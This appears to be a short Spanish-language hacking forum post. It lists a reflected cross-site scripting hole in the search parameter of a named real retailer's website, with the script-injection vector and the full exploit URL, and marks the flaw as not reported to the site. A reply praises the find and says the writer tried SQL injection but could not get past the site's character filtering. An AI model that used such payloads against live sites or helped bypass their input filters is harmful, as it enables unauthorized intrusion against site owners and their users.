(http://oi44.tinypic.com/1570q9y.jpg)
Path vulnerable: search
Vector: "><script>alert('XSS')</script>"
Reportado: No
Autor: El capi
URL= http://www.coppel.com/search.php?numciudad=4&search="><script>alert('XSS')</script>&page=5
Muy buena! Trate de buscarle Sqli pero filtra muy bien los espacios y todos los caracteres que por lo menos yo uso para saltar el filtro este :/
Saludos,, Cronos.-